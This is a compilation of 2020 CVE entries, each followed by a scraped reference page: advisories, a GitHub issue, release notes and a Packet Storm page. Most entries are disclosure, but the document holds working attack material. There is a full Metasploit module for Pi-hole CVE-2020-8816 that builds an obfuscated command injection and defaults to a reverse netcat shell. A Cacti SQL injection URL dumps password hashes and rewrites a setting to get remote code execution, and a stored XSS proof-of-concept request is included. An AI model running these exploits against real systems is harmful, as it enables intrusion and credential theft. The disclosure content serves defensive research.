OCS Inventory NG 2.7 allows Remote Command Execution via shell metacharacters to require/commandLine/CommandLine.php because mib_file in plugins/main_sections/ms_config/ms_snmp_config.php is mishandled in get_mib_oid.

CVE-2020-14947

The SeedProd coming-soon plugin before 5.1.1 for WordPress allows XSS.

Coming Soon Page, Under Construction & Maintenance Mode by SeedProd plugin for WordPress version 5.1.0 and below were found to be vulnerable to stored XSS while I was auditing the plugin. Plugin version 5.1.2 with improved data sanitization was released on June 24, 2020.

**CVE ID:** CVE-2020-15038

****Summary****

Coming Soon Page, Under Construction & Maintenance Mode by SeedProd is a popular WordPress Plugin with over 1 million active installations. It was found to be vulnerable to stored Cross-Site Scripting (XSS) vulnerability. XSS is a type of vulnerability that can be exploited by attackers to perform various malicious actions such as stealing the victim’s session cookies or login credentials, performing arbitrary actions on the victim’s behalf, logging their keystrokes and more.

**Impact**

While there are multiple ways in which an attacker can perform malicious actions exploiting this vulnerability, let’s take a look at two.

*   **Redirection**:
    
    If an attacker were to exploit the vulnerability, they would be able to use an XSS payload to cause redirection such that any time the developer enables maintenance mode, a user visiting the site would be redirected to a domain under the attacker’s control, which could be made to look exactly like the original website with a login form for the user to submit their credentials. If the user submits their credentials without noticing the changed domain, their account gets compromised.
    
  
*   **Phishing**:
    
    Similarly, an attacker can also use a payload to create a login form on the Coming Soon/Maintenance Mode page itself, trying to bait unsuspecting users into entering their credentials.
    

**Vulnerability**

The Headline field under the Page Settings section along with other fields in the plugin settings were found to be vulnerable to stored XSS, which gets triggered when the Coming Soon page is displayed (both in preview mode and live).

    POST /wp-admin/options.php HTTP/1.1
    Host: localhost:10004
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost:10004/wp-admin/admin.php?page=seed_csp4
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 636
    Origin: http://localhost:10004
    Connection: close
    Cookie: ...
    
    option_page=seed_csp4_settings_content&action=update&_wpnonce=faced0b8ff&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dseed_csp4&seed_csp4_settings_content%5Bstatus%5D=1&seed_csp4_settings_content%5Blogo%5D=&seed_csp4_settings_content%5Bheadline%5D=%3Cscript%3Ealert%28%22Stored+XSS+in+Page+Headline%22%29%3C%2Fscript%3E&seed_csp4_settings_content%5Bdescription%5D=Proof+of+Concept&seed_csp4_settings_content%5Bfooter_credit%5D=0&submit=Save+All+Changes&seed_csp4_settings_content%5Bfavicon%5D=&seed_csp4_settings_content%5Bseo_title%5D=&seed_csp4_settings_content%5Bseo_description%5D=&seed_csp4_settings_content%5Bga_analytics%5D=

****Timeline****

Vulnerability reported to the SeedProd team on June 22, 2020.  
Version 5.1.2 containing the fix to the vulnerability was released on June 24, 2020.

****Recommendation****

It is highly recommended to update the plugin to the latest version.

**Reference**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15038
*   https://nvd.nist.gov/vuln/detail/CVE-2020-15038
*   https://wordpress.org/plugins/coming-soon/#developers
*   https://wpvulndb.com/vulnerabilities/10283

For best security practices, you can follow the below guides:

*   WordPress Security Guide
*   WordPress Hack and Malware Removal

Tags: coming soon page, Cross Site Scripting, maintenance mode, seedprod, stored xss, under construction, vulnerability, WordPress, WordPress Maintenance, Wordpress Plugin Vulnerability, wordpress security, XSS

**Jinson Varghese**

Jinson Varghese Behanan is an Information Security Analyst at Astra. Passionate about Cybersecurity from a young age, Jinson completed his Bachelor's degree in Computer Security from Northumbria University. When he isn’t glued to a computer screen, he spends his time reading InfoSec materials, playing basketball, learning French and traveling. You can follow him on Medium or visit his Website for more stories about the various Security Audits he does and the crazy vulnerabilities he finds.

CVE-2020-15038: XSS Found In Coming Soon Page and Maintenance Mode Plugin

An issue was discovered in Navigate CMS 2.8 and 2.9 r1433. The query parameter fid on the resource navigate.php does not perform sufficient data validation and/or encoding, making it vulnerable to reflected XSS.

I recently took part in a live bug hunting event:

> — OnSecurity - We're Hiring! (@HackersOnDemand) June 9, 2020

As part of these event, we reviewed the product Navigate CMS. In order to perform this review I setup a local instance of this tool, using version v2.9 r1433 (2020/06).

While taking part of this event, I managed to help identify several findings:

*   User enumeration
*   Session information leakage
*   User password reset vulnerability
*   Store Cross-Site Scripting (XSS)
*   Reflected Cross-Site Scripting (XSS)

**User Enumeration - CVE-2020-14016**

Navigate CMS has a _Forgot password?_ feature, which allows a user to reset their password if they forgot what their current password is.

Navigate CMS login page with _Forgot password?_ link.

In order to use this feature the user supplies either their username associated with their account, or the email address which is associate with their account.

Forgot password feature.

When entering the username or email address of a non-existent user, it produces and error stating that the user couldn't be found:

Result of providing details of non-existent user.

When reviewing the HTTP response it can clearly be seen that the HTTP response responds with the message _not\_found_ in the response body:

**HTTP request:**

    POST /navigate/login.php HTTP/1.1
    Host: 192.168.0.130
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0
    Accept: */*
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    X-Csrf-Token: 236c7e771d9d104865dd84a095910bdeef4434443f7c55be1cdff82bb6037b7f
    X-Requested-With: XMLHttpRequest
    Content-Length: 36
    Origin: http://192.168.0.130
    Connection: close
    Referer: http://192.168.0.130/navigate/login.php
    Cookie: PHPSESSID=6ls0ko8kgh9fikeqt0a78cmp0t; navigate-tinymce-scroll=%7B%7D; NVSID_ff0d48a629500e15=6ls0ko8kgh9fikeqt0a78cmp0t
    
    action=forgot-password&value=invalid
    

**HTTP Response**

    HTTP/1.1 200 OK
    Date: Wed, 10 Jun 2020 16:55:33 GMT
    Server: Apache/2.4.41 (Ubuntu)
    Set-Cookie: NVSID_ff0d48a629500e15=6ls0ko8kgh9fikeqt0a78cmp0t; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Set-Cookie: NVSID_ff0d48a629500e15=6ls0ko8kgh9fikeqt0a78cmp0t; expires=Wed, 10-Jun-2020 17:55:33 GMT; Max-Age=3600; path=/; domain=192.168.0.130; HttpOnly; SameSite=Lax
    Set-Cookie: PHPSESSID=6ls0ko8kgh9fikeqt0a78cmp0t; expires=Wed, 10-Jun-2020 17:55:33 GMT; Max-Age=3600; path=/; domain=192.168.0.130; HttpOnly; SameSite=Lax
    X-Csrf-Token: 236c7e771d9d104865dd84a095910bdeef4434443f7c55be1cdff82bb6037b7f
    Vary: Accept-Encoding
    Connection: close
    Content-Type: text/html; charset=utf-8
    Content-Length: 9
    
    not_found
    

Using this one can either use something such as a wordlist to try enumeration which users exist on the system:

User enumeration of the _Forgot password?_ feature.

**Session Information Leakage - CVE-2020-14017**

Navigate CMS stores session information in plaintext files on the server in the webroot. These files are then publicly available to un-authenticated users. As part of the setup, there is an option to copy/install the appropriate _.htaccess_ files used to prevent access to this directory and files. However it appears that this doesn't prevent access with later versions of Apache HTTPD.

Depending how the server has been configured, it could be possible to view the contents of the directory:

Directory list of the directory private/sessions which contains all session files.

Upon navigating to one of the session files (most preferably the most recent), one is able to view details and sensitive information (such as CSRF tokens) which are associated with the session:

Details of session file.

If directory listing has been disabled on the webserver (such as via Apache configuration), an attacker is still able to access these files without authentication, however they would need to bruteforce the session IDs to find existing sessions and thus the existing session files:

Bruteforcing of session files.

**User Password Reset Vulnerability - CVE-2020-14015**

The _Forgot password?_ feature allows a user to reset their password. When a user successfully enters their username or email address in the forgot password feature, an email is sent the user which contains a password reset link. This link contains an _activation code_, which allows the user to then reset the password associated with their account.

When providing an invalid code, the user is presented with the login screen:

Login screen with invalid password activation code.

However a flaw exists when no code is presented, the user is prompted for a new password:

Password reset for now password activation code.

And setting the password results in success:

Password reset successful.

Upon further investigation, the reason is that when a user is created, their account is created without an activation code:

Database after user created.

When no code is supplied in the password reset process flow, the first user without an activation key will be matched and thus have their password reset.

**Stored Cross-Site Scripting - CVE-2020-14018**

While there is HTML encoding on _User_ field in the Users / Edit page, there is not sufficient encoding on the _E-Mail_ field, these leaves it vulnerable to a store XSS vulnerability:

Stored XSS from E-Mail field on the Users / Edit page.

As stated the _User_ field is appropriate HTML encoded, preventing any XSS vulnerability from this field on this page:

HTML encoding of the _User_ field.

However the E-Mail field is does not have sufficient HTML encoding, resulting in a stored XSS vulnerability:

XSS vulnerability in the _E-Mail_ field.

This stored XSS vulnerability is persisted and present from both the _User_ as well as the _E-Mail_ fields when viewing users on the _Users_ page:

Stored XSS from the _User_ field.

Stored XSS from the _E-Mail_ field.

**Reflected Cross-Site Scripting - CVE-2020-14014**

On the landing page once the user authenticates, there is a resource _/nagivate.php_ which can take the query parameter _fid_. The value from this parameter is reflected back on the page, without having appropriate validation or HTML encoding. This makes the page vulnerable to reflected XSS:

Reflected XSS from the vulnerable _fid_ query parameter.

This is since the value is reflected to a link in the top right corner of the page:

Reflected link contain the reflected XSS.

**Resolution**

Fixed as of version v2.9.1 r1487 (2020/06).

**Vendor Notification**

*   10 June 2020 - Initial contact with the vendor, indicating wish to share findings with vendor before disclosing publicly.
*   11 June 2020 - Received response from vendor expressing wish to obtain information about findings.
*   11 June 2020 - Forwarded findings to vendor.
*   17 June 2020 - Vendor shared fixes with myself and asked me to review the fixes.
*   21 June 2020 - Reviewed fixes and confirmed with vendor.
*   22 June 2020 - Vendor confirmed new version and approved public disclosure of findings.

CVE-2020-14014: Navigate CMS

A SQL injection issue in color.php in Cacti 1.2.12 allows an admin to inject SQL via the filter parameter. This can lead to remote command execution because the product accepts stacked queries.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

Mayfly277 opened this issue

Jun 17, 2020

· 13 comments

**Comments**

**sqli as admin v1.2.12**

There is an sql injection on the latest version (in the /cacti/color.php page on the parameter filter.

**To Reproduce**

Steps to reproduce the behavior:

call /cacti/color.php?action=export&header=false&filter=')<SQLI HERE>--+-

**Expected behavior**

change the following lines :  

$sql\_where = "WHERE (name LIKE '%" . get\_request\_var('filter') . "%'

    	/* form the 'where' clause for our main sql query */
    	if (get_request_var('filter') != '') {
    		$sql_where = "WHERE (name LIKE '%" . get_request_var('filter') . "%'
    			OR hex LIKE '%" .  get_request_var('filter') . "%')";
    	} else {
    		$sql_where = '';
    }
    

You should do db_qstr('%' . get_request_var('filter') . '%') instead of '%" . get\_request\_var('filter') . "%.

**Additional context**

*   As the application accept stacked queries, this can easy lead to remote code execution by replacing the path\_php\_binary setting inside the database.

    GET /cacti/color.php?action=export&header=false&filter=1')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;update+settings+set+value='touch+/tmp/sqli_from_rce;'+where+name='path_php_binary';--+- 
    

*   Then call host.php?action=reindex and get the shell\_exec called with the path\_php\_binary.  
    

Not sure if that was already covered in our current CVE tracker. Have you tested against the very latest 1.2.x branch ?

I tried with that image which use the latest release : quantumobject/docker-cacti  
And the request :

    /cacti/color.php?action=export&header=false&filter=')+UNION+SELECT+1,username,password,4,5,6,7+from+user_auth;-- -`
    

Is getting back the users and hash.

The code on this function haven't change in 3 years:

But the filter change 11 months ago and that change bring the issue.

*   The actual code (1.12.x branch):

*   before the issue Non regular expression search filters don't support international characters #2839 fix the code (v1.2.6) seems to be not vulnerable :

This was resolved some time ago in the 1.2.x branch.

> This was resolved some time ago in the 1.2.x branch.

Would you have a commit reference int the 1.2.x branch which is fixing the issue?

No this is **NOT** fixed.  
I just tried with a fresh checkout of 1.2.x. and the exploit still work.  
Please reopen @TheWitness

Mayfly277 pushed a commit to Mayfly277/cacti that referenced this issue

Jun 18, 2020

Mayfly277 pushed a commit to Mayfly277/cacti that referenced this issue

Jun 18, 2020

Thanks for verifying. And supplying a patch. Could you add the CVE number to the changelog ?

You have to be reviewing something other than the 1.2.x branch. Here is a screen capture of the 1.2.x branch. Tell me which part of this does not conform to your reasoning?

@Mayfly277, after re-reading, I think you are confused. It's "git clone -b 1.2.x ...". It's not "branch 1.12.x, it's 1.2.x.

I'll be damned. Where did that come from. Re-opening. Thanks for being persistent.

From Code: color.php always process filter by function sanitize_search_string.  
And sanitize_search_string will drop char ', , ; and )\`.  
Why your env can get SQL result.

In my test, final SQL like SQL below, all invalid char is dropped, and injection SQL around with single quot:

SELECT \*, 
        SUM(CASE WHEN local\_graph\_id\>0 THEN 1 ELSE 0 END) AS graphs, 
        SUM(CASE WHEN local\_graph\_id\=0 THEN 1 ELSE 0 END) AS templates 
    FROM (
        SELECT c.\*, local\_graph\_id 
        FROM colors AS c LEFT JOIN (
            SELECT color\_id, graph\_template\_id, local\_graph\_id FROM graph\_templates\_item WHERE color\_id\>0 
        ) AS gti ON c.id\=gti.color\_id 
    ) AS rs 
    WHERE (name LIKE '%1 UNION SELECT 1 username password 4 5 6 7 from user\_auth %' 
            OR hex LIKE '%1 UNION SELECT 1 username password 4 5 6 7 from user\_auth %') 
        AND read\_only\='on' 
    GROUP BY rs.id

 netniV changed the title \[security\] sqli as admin SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295)

Jul 12, 2020

CVE-2020-14295: SQL Injection vulnerability due to input validation failure when editing colors (CVE-2020-14295) · Issue #3622 · Cacti/cacti

In affected versions of WordPress, authenticated users with upload permissions (like authors) are able to inject JavaScript into some media file attachment pages in a certain way. This can lead to script execution in the context of a higher privileged user when the file is viewed by them. This has been patched in version 5.4.2, along with all the previously affected versions via a minor release (5.3.4, 5.2.7, 5.1.6, 5.0.10, 4.9.15, 4.8.14, 4.7.18, 4.6.19, 4.5.22, 4.4.23, 4.3.24, 4.2.28, 4.1.31, 4.0.31, 3.9.32, 3.8.34, 3.7.34).

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 1.7k

*   Code
*   Pull requests 866
*   Actions
*   Security
*   Insights

Permalink

Browse files

Editor: Prevent HTML decoding on by setting the proper editor context.

*   Loading branch information

Showing **1 changed file** with **1 addition** and **1 deletion**.

@@ -3231,7 +3231,7 @@ function edit\_form\_image\_editor( $post ) {

  

?>

</label\>

<?php wp\_editor( $post\->post\_content, 'attachment\_content', $editor\_args ); ?>

<?php wp\_editor( format\_to\_edit( $post\->post\_content ), 'attachment\_content', $editor\_args ); ?>

  

</div\>

<?php

**0 comments on commit 0977c0d**

Please sign in to comment.

CVE-2020-4047: Editor: Prevent HTML decoding on by setting the proper editor context. · WordPress/wordpress-develop@0977c0d

An issue was discovered in Roundcube Webmail before 1.3.12 and 1.4.x before 1.4.5. include/rcmail_output_html.php allows XSS via the username template object.

This is a service and security update to the LTS version 1.3 of Roundcube Webmail.  
It contains four fixes for recently reported security vulnerabilities as well a  
small number of general improvements backported from the latest stable version.  
See the full changelog below.

**Security fixes**

*   Fix XSS issue in template object 'username' (#7406)
*   Fix cross-site scripting (XSS) via malicious XML attachment
*   Fix a couple of XSS issues in Installer (#7406)
*   Better fix for CVE-2020-12641

The latter two vulnerabilities again are related to public access to the Roundcube installer  
and are therefore classified minor.

This version in considered stable and we recommend to update all productive installations  
of Roundcube 1.3.x with it. Please do backup your data before updating!

**CHANGELOG**

*   Security: Better fix for CVE-2020-12641
*   Security: Fix XSS issue in template object 'username' (#7406)
*   Security: Fix couple of XSS issues in Installer (#7406)
*   Security: Fix cross-site scripting (XSS) via malicious XML attachment

CVE-2020-13964: Release Roundcube Webmail 1.3.12 · roundcube/roundcubemail

PHPMailer before 6.1.6 contains an output escaping bug when the name of a file attachment contains a double quote character. This can result in the file type being misinterpreted by the receiver or any mail relay processing the message.

**Impact**

CWE-116: Incorrect output escaping.

An attachment added like this (note the double quote within the attachment name, which is entirely valid):

    $mail->addAttachment('/tmp/attachment.tmp', 'filename.html";.jpg');
    

Will result in a message containing these headers:

    Content-Type: application/octet-stream; name="filename.html";.jpg"
    Content-Disposition: attachment; filename="filename.html";.jpg"
    

The attachment will be named filename.html, and the trailing ";.jpg" will be ignored. Mail filters that reject .html attachments but permit .jpg attachments may be fooled by this.

Note that the MIME type itself is obtained automatically from the _source filename_ (in this case attachment.tmp, which maps to a generic application/octet-stream type), and not the _name_ given to the attachment (though these are the same if a separate name is not provided), though it can be set explicitly in other parameters to attachment methods.

**Patches**

Patched in PHPMailer 6.1.6 by escaping double quotes within the name using a backslash, as per RFC822 section 3.4.1, resulting in correctly escaped headers like this:

    Content-Type: application/octet-stream; name="filename.html\";.jpg"
    Content-Disposition: attachment; filename="filename.html\";.jpg"
    

**Workarounds**

Reject or filter names and filenames containing double quote (") characters before passing them to attachment functions such as addAttachment().

**References**

CVE-2020-13625.  
PHPMailer 6.1.6 release

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in the PHPMailer repo

CVE-2020-13625: 2020-05-26 Insufficient output escaping of attachment names

phpList before 3.5.4 allows XSS via /lists/admin/user.php and /lists/admin/users.php.

phpList 3.5.4 is now available for download, including several security fixes reported by: @r0ck3t1973, Songohan22 and Penghui Li, Sarthak Saini and  Carlos Ramírez.

Additionally, this release includes a “Beta” version of “Generate Preview” option that makes it possible for you to see how the preview of your campaign will look in most email clients.  
You can check what the current implementation can and can not do here and you can propose  future improvements in the mantis issue.  
Thanks to @samtuke for implementing this.

**Changes in this release****Usability improvements and functionality enhancements:**

1.  Clickable link at the top of the click stats page — thanks to @samtuke, see \[the pull request\](https://github.com/phpList/phplist3/pull/656)
2.   Added HTTP\_Request2 as a fallback when curl is not available — thanks to @duncanc, see \[the pull request\](https://github.com/phpList/phplist3/pull/652) for more details.
3.  Updater menu entry is now shown only for superusers
4.  The updater handles deletion of broken symlinks
5.   Help added for the website field on the Settings page and updated help texts about date format and ‘ tracking codes — thanks to @duncanc

**Fixes**

1.  \[Security Fix\]: Implement XSS filters in /lists/admin/admin.php and /lists/admin/admins.php — thanks to Sarthak Saini for reporting the issue and @xh3n1 for providing the fix.
2.  \[Security Fix\]: Implement XSS filter in /lists/admin/user.php and /lists/admin/users.php — thanks to Carlos Ramírez from wizlynx group for reporting the issue.
3.  \[Security Fix\]: Implement XSS filter in /lists/admin/editattributes.php — thanks to @r0ck3t1973 for reporting the issue
4.  \[Security Fix\]: Implement XSS filter in /lists/admin/send\_core.php — thanks to @r0ck3t1973 for reporting the issue
5.  \[Security Fix\]: Implement XSS filter in /lists/admin/connect.php and /lists/admin/subscribelib2.php — thanks to @r0ck3t1973  for reporting the issue
6.  \[Security Fix\]: Implement XSS filter in /lists/admin/configure.php and /lists/admin/list.php — thanks to @r0ck3t1973 for reporting the issue
7.  \[Security Fix\]: Implement XSS filter in /lists/admin/importsimple.php and /inc/magic\_quotes.php — thanks to @Songohan22  for reporting the issue
8.  \[Security Fix\]: Switch to strict comparison in  /lists/admin/index.php and  /lists/admin/subscribelib2.php — thanks to @peng-hui for reporting the issue
9.  Updated default list of TLDs — thanks to @duncanc for pointing it out the problem
10.  Fixed incorrect statistics link in German installations, due to incorrect translation see \[mantis issue\](https://mantis.phplist.org/view.php?id=20183) — please consider that fetching translations won’t fix the issue for now. It’s the update itself that uses the corrected version. Thanks to @jimbocity for reporting it.
11.  Fixed broken link in the Install file — thanks to \[Hiroyuki Sato\]( https://github.com/hiroyuki-sato)

**Other**

*   Changed config value for “$database\_host ” from ‘localhost’ to ‘dbhost’ — enabling a default setup that works with a DB that is not on the same machine

****

This release is the work of Duncan Cameron, Sam Tuke, Xheni Myrtaj and other Open Source community members who have submitted bug reports and valuable feedback, as well as phpList Ltd. developers. To get involved in phpList development, check out the developer resources pages.

Report any issues you find with phpList 4 core or REST API  to the corresponding repo on GitHub. Please read the contribution guide on how to contribute to these modules.

**Support**

Need help upgrading your phpList server to the newest version? Ask the community at discuss.phplist.org. Professional support from community experts, as well as manuals, source code, and developer resources, can be found at phplist.org. Report all bugs to the bugtracker!

Want to focus on campaigns and forget hosting headaches? Sign up at phplist.com for an account with everything included. Send from 300 free messages to 30 million messages per month — simple.

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish.Accept Read More

CVE-2020-13827: phpList 3.5.4 released: Security Release

Pi-hole Web v4.3.2 (aka AdminLTE) allows Remote Code Execution by privileged dashboard users via a crafted DHCP static lease.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = GoodRanking  include Msf::Exploit::Remote::HttpClient  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Pi-Hole DHCP MAC OS Command Execution',        'Description' => %q{          This exploits a command execution in Pi-Hole <= 4.3.2.  A new DHCP static lease is added          with a MAC address which includes an RCE.  Exploitation requires /opt/pihole to be first          in the $PATH due to exploitation constraints.  DHCP server is not required to be running.        },        'License' => MSF_LICENSE,        'Author' =>          [            'h00die', # msf module            'nateksec' # original PoC, discovery          ],        'References' =>          [            ['URL', 'https://natedotred.wordpress.com/2020/03/28/cve-2020-8816-pi-hole-remote-code-execution/'],            ['CVE', '2020-8816']          ],        'Platform' => ['unix'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' =>          [            [ 'Automatic Target', {}]          ],        'DisclosureDate' => 'Mar 28 2020',        'DefaultTarget' => 0,        'DefaultOptions' => {          'PAYLOAD' => 'cmd/unix/reverse_netcat'        },        'Payload' => {          'BadChars' => "\x00"        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options(      [        Opt::RPORT(80),        OptString.new('PASSWORD', [ false, 'Password for Pi-Hole interface', '']),        OptString.new('TARGETURI', [ true, 'The URI of the Pi-Hole Website', '/'])      ]    )  end  def check    begin      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php'),        'method' => 'GET'      )      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?      fail_with(Failure::UnexpectedReply, "#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") if res.code != 200      # vDev (HEAD, v4.3-0-g44aff72)      # v4.3      %r{<b>Web Interface Version\s*</b>\s*(vDev $HEAD, )?v?(?<version>[\d\.]+)$?.*<b>}m =~ res.body      if version && Gem::Version.new(version) <= Gem::Version.new('4.3.2')        vprint_good("Version Detected: #{version}")        return CheckCode::Appears      else        vprint_bad("Version Detected: #{version}")        return CheckCode::Safe      end    rescue ::Rex::ConnectionError      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")    end    CheckCode::Safe  end  def login(cookie)    vprint_status('Login required, attempting login.')    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),      'cookie' => cookie,      'vars_get' => {        'tab' => 'piholedhcp'      },      'vars_post' => {        'pw' => datastore['PASSWORD']      },      'method' => 'POST'    )  end  def add_static(payload, cookie, token)    # we don't use vars_post due to the need to have duplicate fields    send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),      'ctype' => 'application/x-www-form-urlencoded',      'cookie' => cookie,      'method' => 'POST',      'vars_get' => {        'tab' => 'piholedhcp'      },      'data' => [        'AddMAC=',        'AddIP=',        'AddHostname=',        "AddMAC=#{URI.encode_www_form_component(payload)}",        "AddIP=192.168.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}", #to_i to remove leading 0s        "AddHostname=#{rand_text_alphanumeric(8..12)}",        'addstatic=',        'field=DHCP',        "token=#{URI.encode_www_form_component(token)}"      ].join('&')    )  end  def exploit    if check != CheckCode::Appears      fail_with(Failure::NotVulnerable, 'Target is not vulnerable')    end    begin      @macs = []      # get cookie      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'admin', 'index.php')      )      cookie = res.get_cookies      print_status("Using cookie: #{cookie}")      # get token      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),        'cookie' => cookie,        'vars_get' => {          'tab' => 'piholedhcp'        }      )      # check if we got hit by a login prompt      if res && res.body.include?('Sign in to start your session')        res = login(cookie)      end      if res && res.body.include?('Sign in to start your session')        fail_with(Failure::BadConfig, 'Incorrect Password')      end      # <input type="hidden" name="token" value="t51q3YuxWT873Nn+6lCyMG4Lg840gRCgu03akuXcvTk=">      # may also include /      %r{name="token" value="(?<token>[\w+=/]+)">} =~ res.body      unless token        fail_with(Failure::UnexpectedReply, 'Unable to find token')      end      print_status("Using token: #{token}")      # from the excellent writeup about the vuln:      # The biggest difficulty in exploiting this vulnerability is that the user input is      # capitalized through a call to "strtoupper". Because of this, no lower case character      # can be used in the resulting injection.      # we'd like to execute something similar to this:      # aaaaaaaaaaaa&&php -r 'PAYLOAD'      # however, we need to pull p, h, and r from the system due to all input getting capitalized      # this is performed by pulling them from the $PATH which should be something like      # /opt/pihole:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin      # first payload we send is to check that this is in the path to verify exploitation is possible      mac = rand_text_hex(12).upcase      @macs << mac      vprint_status("Validating path with MAC: #{mac}")      res = add_static("#{mac}$PATH", cookie, token)      # ruby regex w/ interpolate and named assignments needs to be in .match instead of =~      env = res.body.match(/value="#{mac}(?<env>.*)">/)      if env && env[:env].starts_with?('/opt/pihole')        print_good("System env path exploitable: #{env[:env]}")      else        msg = '/opt/pihole not in path. Exploitation not possible.'        if env          msg += " Path: #{env[:env]}"        end        fail_with(Failure::UnexpectedReply, msg)      end      # once we have php -r, we then need to pass a payload.  So we do this via php command      # exec on hex2bin since our payload in hex caps will still get processed and executed.      mac = rand_text_hex(12).upcase      @macs << mac      print_status("Payload MAC will be: #{mac}")      shellcode = "#{mac}&&" # mac address, arbitrary      shellcode << 'W=${PATH#/???/}&&'      shellcode << 'P=${W%%?????:*}&&'      shellcode << 'X=${PATH#/???/??}&&'      shellcode << 'H=${X%%???:*}&&'      shellcode << 'Z=${PATH#*:/??}&&'      shellcode << 'R=${Z%%/*}&&$'      shellcode << "P$H$P$IFS-$R$IFS'EXEC(HEX2BIN(" # php -r exec(hex2bin(      shellcode << '"'      shellcode << payload.encoded.unpack('H*').join('') # hex encode payload      shellcode << '"));'      shellcode << "'&&"      vprint_status("Shellcode: #{shellcode}")      print_status('Sending Exploit')      add_static(shellcode, cookie, token)      # we don't use vars_post due to the need to have duplicate fields      ip = '192.168'      2.times {ip="#{ip}.#{rand_text_numeric(1..2).to_i}"} #to_i removes leading zeroes      send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'admin', 'settings.php'),        'ctype' => 'application/x-www-form-urlencoded',        'cookie' => cookie,        'method' => 'POST',        'vars_get' => {          'tab' => 'piholedhcp'        },        'data' => [          'AddMAC=',          'AddIP=',          'AddHostname=',          "AddMAC=#{URI.encode_www_form_component(shellcode)}",          "AddIP=192.168.#{rand_text_numeric(1..2).to_i}.#{rand_text_numeric(1..2).to_i}", #to_i to remove leading 0s          "AddHostname=#{rand_text_alphanumeric(3..8)}",          'addstatic=',          'field=DHCP',          "token=#{URI.encode_www_form_component(token)}"        ].join('&')      )    # entries are written to /etc/dnsmasq.d/04-pihole-static-dhcp.conf    rescue ::Rex::ConnectionError      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")    end  end  def on_new_session(session)    super    @macs.each do |mac|      print_status("Attempting to clean #{mac} from config")      session.shell_command_token("sudo pihole -a removestaticdhcp #{mac}")    end  endend

CVE-2020-8816: Pi-Hole 4.3.2 DHCP MAC OS Command Execution ≈ Packet Storm

In QEMU 5.0.0 and earlier, es1370_transfer_audio in hw/audio/es1370.c does not properly validate the frame count, which allows guest OS users to trigger an out-of-bounds access during an es1370_write() operation.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

Tag

#php